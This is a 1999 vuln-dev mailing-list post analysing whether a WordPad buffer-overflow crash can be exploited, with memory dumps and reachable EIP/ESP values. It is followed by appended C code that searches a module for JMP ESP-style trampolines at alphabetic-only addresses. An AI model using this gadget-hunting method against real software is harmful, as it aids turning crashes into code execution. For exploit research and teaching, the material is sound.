Vulnerability Development mailing list archives

Re: development of wordpad exploit


From: dullien () GMX DE (Thomas Dullien)
Date: Mon, 22 Nov 1999 12:35:44 +0100


On Sun, 21 Nov 1999 12:41:24 CET, Pauli Ojanpera wrote:

Notifications about things...

In NT, WordPad crashes with lowercased alphas as opposed to uppercase
in 98. That's why some people get 41414141 and some get 61616161.


Hrmm.. this is interesting. If we can get uppercase letters, we might be
able to get other things as well that could make this thing exploitable.

I assume that under 9x, riched20.dll is used instead of riched32.dll in NT.
Can someone verify this? Or perhaps do a similar analysis of WordPad's
behaviour on 9x like the one I did?

Under NT it looks grim though, I still don't think it is exploitable. Beware,
though, that I have not been into security for a long time, and I could have forgotten
some clever trick that some of the older guys here know ;>  Here are
my results from trying to set EIP to any of our code:

Well, our main problem is setting the EIP correctly. If we can manage to
somehow execute our code, it is possible that we could perhaps manage
to jmp to the mapped file. Problem:
We can set EIP to the following:
75023a00 
        EC 83 EC 04
        in al, dx --> not useful
75020061-75023007A
        00 00 00 C0 E0 04 FF 4D-F0 0A C1 8B 4D EC FF 45 
        EC 88 01 8B 16 80 3A 00-75 BC 8B 06 33 C9 38 08  
        Nothing that can be used to go to execute code on the
        stack either...

now the fun part :)
I don't know if in any of these bytes is the possibility of changing EIP
to esp. I haven't found anything obvious such as PUSH ESP, RET
(0x54, 0xC3) or JMP ESP or so... well, if you do find a way, please 
tell me ;>

0023:75006161 45 FE 0F BF 55 FA 03 C3-03 C2 3B 45 E4 7E 26 33  
0023:75006171 C0 39 45 F0 75 7B 3B 5D-E4 7E 10 66 2B FB 8B 

0023:75006261 FF FF FF 8B 86 34 05 00-00 99 F7 FF 03 C8 85 C9 
0023:75006271 7F 2D 33 C9 EB 29 8B 86-34 05 00 00 8D 57 01 

0023:75006361 8E A8 05 00 00 50 E8 AB-D4 FF FF EB 04 80 4E 7C
0023:75006371 01 33 C0 5F 5E 5B 8B E5-5D C3 83 EC 08 56 39 

0023:75006461 FF 15 28 42 02 75 57 6A-18 55 FF 15 28 42 02 75 
0023:75006471 56 8B 3D E0 42 02 75 53-55 FF D7 8D 44 24 10 

0023:75006561 5F 5E 5B C2 04 00 55 8B-EC 83 EC 10 56 57 52 8B
0023:75006571 F2 8B F9 FF 15 44 40 02-75 8B 87 30 05 00 00 

0023:75006661 E5 5D C2 0C 00 53 56 83-79 04 00 66 8B DA 57 8B
0023:75006671 F1 74 69 33 FF 6A F4 FF-36 FF 15 D8 42 02 75 

0023:75006761 85 C0 B8 00 00 00 00 74-0F 57 6A 00 68 81 00 00
0023:75006771 00 56 FF 15 E8 42 02 75-5F 5E C3 53 56 57 8B 

0023:75006861 96 B4 04 00 00 6B FF 14-8B 4D F0 39 0C 17 75 07
0023:75006871 B8 FF FF FF FF EB 07 83-7D FC 00 7E 01 48 5F 

0023:75006961 00 00 85 D2 7C 0E FF 75-0C FF 75 08 57 8B CE E8
0023:75006971 88 31 01 00 5F 5E 5B 8B-E5 5D C2 08 00 56 8B 

0023:75006A61 F0 85 F6 7E 1B 8D 45 F4-8B CF 50 E8 1C CD FF FF
0023:75006A71 8D 55 F4 8B CF FF 75 0C-56 E8 E7 32 00 00 8B 

0023:75006B61 02 75 EB 2D F6 46 63 01-74 27 8B 45 E8 8D 4D E8
0023:75006B71 FF 75 FC FF 75 F8 51 C7-45 E8 00 00 00 00 89 

0023:75006C61 74 05 8A 4D DB 88 08 80-7D 08 01 74 0D 8A 45 08
0023:75006C71 38 45 D7 B8 00 00 00 00-75 03 8B 45 BC 5F 5E 

0023:75006D61 00 B9 0F 00 00 00 8B FA-F3 A5 8B 4C 24 14 C7 02
0023:75006D71 01 00 00 00 A1 04 80 02-75 85 C9 7C 50 8B 68 

0023:75006E61 00 2B 41 08 99 F7 FE 8B-F0 83 C3 3C 4F 83 FF 01
0023:75006E71 7F C5 68 28 80 02 75 FF-15 6C 41 02 75 83 7D 

0023:75006F61 FF FF 8D 55 F4 8B CF E8-49 F5 FF FF 80 38 0D 75
0023:75006F71 4F 4B 85 DB 7E 4A 6A FF-EB 2C 3C 0D 75 42 8D 

0023:75007061 FF 15 B0 42 02 75 5E C3-55 8B EC 83 EC 18 8B C2
0023:75007071 53 C1 E0 05 56 57 8B F1-6A 01 89 55 FC 8B 8C 

0023:75007161 8B CE E8 67 32 00 00 5F-5E 5B 8B E5 5D C3 53 56
0023:75007171 8B 41 08 57 3B D0 8B FA-8B F1 74 2E 8B 16 7D 

0023:75007261 83 C7 2C 89 45 F0 89 55-F4 8B 07 C1 E0 05 6B C9
0023:75007271 14 8B 9C 30 B4 04 00 00-03 D9 83 7D FC 00 7D 

0023:75007361 3B C3 7F 02 8B C3 3B F8-8B EF 7C 02 8B E8 3B FB
0023:75007371 75 28 8B 96 E0 00 00 00-83 EA 02 3B EA 7E 1B 

0023:75007461 B8 FF FF FF FF 89 81 98-05 00 00 89 81 9C 05 00
0023:75007471 00 C3 55 8B EC 83 EC 2C-53 56 57 8B D9 83 79 

0023:75007561 00 00 89 4D B4 85 D2 7E-12 83 BB 90 05 00 00 00
0023:75007571 74 09 C7 45 C8 01 00 00-00 EB 07 C7 45 C8 00 

0023:75007661 C7 0C 89 4D E0 89 7D C4-8B 11 8B 0F 03 CA 3B 4D
0023:75007671 98 7F 13 C7 45 E8 01 00-00 00 C7 45 E4 00 00 

0023:75007761 7E 13 2B 75 08 8B 4D 0C-03 CE 8B 45 BC 3B C8 7F
0023:75007771 02 8B C8 8B F1 8B 4D C0-C7 01 00 00 00 00 8B 

0023:75007861 F0 FF 15 E4 41 02 75 8B-45 B0 39 83 A4 04 00 00
0023:75007871 7E 10 8B 4D D0 8B 55 E0-8B 01 2B 02 03 45 B0 

0023:75007961 55 F0 FF 15 E4 41 02 75-85 FF 74 07 57 FF 15 08
0023:75007971 40 02 75 85 F6 74 07 56-FF 15 08 40 02 75 6A 

0023:75007A61 FF 56 8B 47 10 2B 47 0C-8D 54 24 0C 50 8B CF E8 
0023:75007A71 13 60 00 00 EB 21 83 E8-08 8B 97 30 01 00 00 

0023:75007B61 00 80 67 03 BF 8B C3 5F-5E 5B C3 55 8B EC 83 EC  
0023:75007B71 5C 53 56 8D 81 2C 05 00-00 57 8B F1 33 DB 8B 

The entire range 00616161-007A7A7A with all its in-between things is
non-paged, so no chance here. In the region 61616161-7A7A7A7A,
everything that can be reached by our combinations is non-paged as
well :-(

Damn, it would've been too cool to exploit this babe ;>
That's why I tried only overwriting part of EBP which is then moved into
ESP one function higher, which leads me to the
following possible ESPs I can set:

12EF00 --> works, but will leave me with an EIP in 00600000 range,
which is all nonpaged. 
120061-12007A --> nonpaged, will cause exception, so unusable.

Thomas Dullien
dullien () gmx de
Win32 Security Consultant ;-> Hire me !
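The search described in the message above (looking for PUSH ESP; RET, JMP ESP or similar in the address ranges that can be spelled with the bytes the crash lets through) is a mechanical one, and can be scripted over a dump of the mapped DLL. The following is an added example written for this archive page, not code from the original thread: it scans a byte image at a given base address for the three common stack trampolines and keeps only the hits whose attacker-controlled address bytes are lowercase letters (the NT case; swap in the uppercase predicate for the 98 case). The sample image, its base address and the planted gadgets are constructed for illustration and are not real riched32 bytes; the mask parameter models a partial overwrite where only some bytes of EIP are attacker-supplied, as in the 0x7500xxxx addresses above.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Two-byte x86 sequences that transfer control to the stack. */
typedef struct {
    const char *name;
    uint8_t     op[2];
} gadget_t;

static const gadget_t GADGETS[] = {
    { "jmp esp",       { 0xFF, 0xE4 } },
    { "call esp",      { 0xFF, 0xD4 } },
    { "push esp; ret", { 0x54, 0xC3 } },
};
#define NGADGETS (sizeof GADGETS / sizeof GADGETS[0])

typedef struct {
    uint32_t    addr;
    const char *gadget;
} hit_t;

int is_lower_alpha(uint8_t b) { return b >= 'a' && b <= 'z'; }
int is_upper_alpha(uint8_t b) { return b >= 'A' && b <= 'Z'; }

/* mask marks the address bytes the attacker controls (0xFF per byte);
 * each of those bytes must satisfy byte_ok. Unmasked bytes are taken to
 * keep their original value (partial overwrite) and are not checked. */
int addr_passes(uint32_t addr, uint32_t mask, int (*byte_ok)(uint8_t))
{
    for (int shift = 0; shift < 32; shift += 8) {
        if (((mask >> shift) & 0xFF) == 0) continue;
        if (!byte_ok((uint8_t)(addr >> shift))) return 0;
    }
    return 1;
}

/* Scan image[0..len), assumed mapped at base, for trampolines whose
 * address passes the byte constraint. Returns the total number of hits;
 * at most max_hits are stored. byte_ok == NULL disables the filter. */
size_t find_stack_trampolines(const uint8_t *image, size_t len, uint32_t base,
                              uint32_t mask, int (*byte_ok)(uint8_t),
                              hit_t *hits, size_t max_hits)
{
    size_t n = 0;
    for (size_t i = 0; i + 1 < len; i++) {
        for (size_t g = 0; g < NGADGETS; g++) {
            if (image[i] != GADGETS[g].op[0] || image[i + 1] != GADGETS[g].op[1])
                continue;
            uint32_t addr = base + (uint32_t)i;
            if (byte_ok && !addr_passes(addr, mask, byte_ok))
                continue;
            if (n < max_hits) {
                hits[n].addr   = addr;
                hits[n].gadget = GADGETS[g].name;
            }
            n++;
        }
    }
    return n;
}

/* Constructed sample image (hypothetical base, NOP filler, planted gadgets).
 * Offsets are chosen so that only two hits have all-letter low bytes. */
#define SAMPLE_BASE 0x75006100u
#define SAMPLE_LEN  0x200u

void build_sample_image(uint8_t *buf)
{
    memset(buf, 0x90, SAMPLE_LEN);
    buf[0x06D] = 0xFF; buf[0x06E] = 0xE4;   /* jmp esp       @ 7500616D  low bytes "am" */
    buf[0x030] = 0x54; buf[0x031] = 0xC3;   /* push esp; ret @ 75006130  '0' is not a letter */
    buf[0x17A] = 0xFF; buf[0x17B] = 0xD4;   /* call esp      @ 7500627A  low bytes "bz" */
    buf[0x1A0] = 0xFF; buf[0x1A1] = 0xE4;   /* jmp esp       @ 750062A0  0xA0 is not a letter */
}

/* Scan the constructed sample; with max_hits == 0 it only counts. */
size_t scan_sample(uint32_t mask, int (*byte_ok)(uint8_t), hit_t *hits, size_t max_hits)
{
    static uint8_t image[SAMPLE_LEN];
    build_sample_image(image);
    return find_stack_trampolines(image, SAMPLE_LEN, SAMPLE_BASE, mask, byte_ok, hits, max_hits);
}

uint32_t sample_hit_addr(size_t idx, uint32_t mask, int (*byte_ok)(uint8_t))
{
    hit_t hits[16];
    size_t n = scan_sample(mask, byte_ok, hits, 16);
    return idx < n ? hits[idx].addr : 0;
}

int main(void)
{
    hit_t hits[16];
    /* Only the low two bytes of EIP are attacker-supplied, and must be a-z. */
    size_t n = scan_sample(0x0000FFFFu, is_lower_alpha, hits, 16);
    for (size_t i = 0; i < n; i++)
        printf("%08x  %s\n", (unsigned)hits[i].addr, hits[i].gadget);
    return 0;
}
```

On a real target the image would be the bytes of the mapped module read from the debugger or from the file on disk at its load address, and the mask would be set from how many bytes of the saved return address the overflow actually reaches. The filter is the whole point: a trampoline at an address that cannot be spelled with the surviving bytes is as useless as no trampoline at all.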

